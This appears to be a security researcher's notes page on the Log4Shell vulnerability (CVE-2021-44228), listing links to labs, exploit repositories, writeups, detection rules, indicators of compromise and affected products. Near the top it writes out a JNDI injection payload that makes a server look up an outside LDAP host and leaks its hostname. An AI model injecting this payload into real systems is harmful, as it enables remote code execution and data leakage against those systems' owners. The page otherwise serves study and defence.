Log4J

Log4j

https://pentesterlab.com/exercises/log4j_rce/course https://github.com/christophetd/log4shell-vulnerable-app http://www.dnslog.cn/ https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j https://www.lunasec.io/docs/blog/log4j-zero-day/

And a programmer might not even know that this vulnerability exists in their code because they might be using some other library that depends on the log4j library.

${jndi:ldap://${hostName}.io}

Summary/Writeups:

• CVE-2021-44228

• Vendor vulnerability notification

• LunaSec Writeup (this submission)

• Randori Writeup

• Cloudflare Writeup (CF WAF customers are protected)

• Fastly Writeup (Fastly WAF customers must enable a rule)

Validation & Detection:

• Semgrep rules for searching source code

• Sourcegraph queries for searching source code

• YARA and grep rules for blue teams (see comments for nuances)

• ET Labs releases out of band rules for Snort and Suricata

• Zeek detection logic

• Use CanaryTokens to test services for vulnerability

• Rules for Burp Suite ActiveScan++

• Crowdstrike Threat Hunt Queries

Indicators of Compromise:

• Hashes for known vulnerable versions of log4j libraries

• Atomic IoCs seen performing mass exploitation (mostly tor exit nodes)

• Get updated lists from GreyNoise API

Proof of Concept:

• Proof of Concept

• Evidence that attackers have had a working exploit since at least April

Reported Impacts:

• VCenter Server uses log4j and is vulnerable

• Ubiquiti Unifi (UDM, UDMP, Cloudkey, Unifi Controller)

• Palo Alto Panorama (unconfirmed)

• QRadar SIEM (unconfirmed)

• Some of the above sourced from this impact repo.

Misc:

• Excellent thread over at /r/blueteamsec

• Hacker News thread

• Exploit can leak server side variables

• Apache github PR with some discussion

• Possibility that v1.X series is affected (unconfirmed)?

• Possibility that iiop:// and related CORBA protocols are vulnerable (unconfirmed)?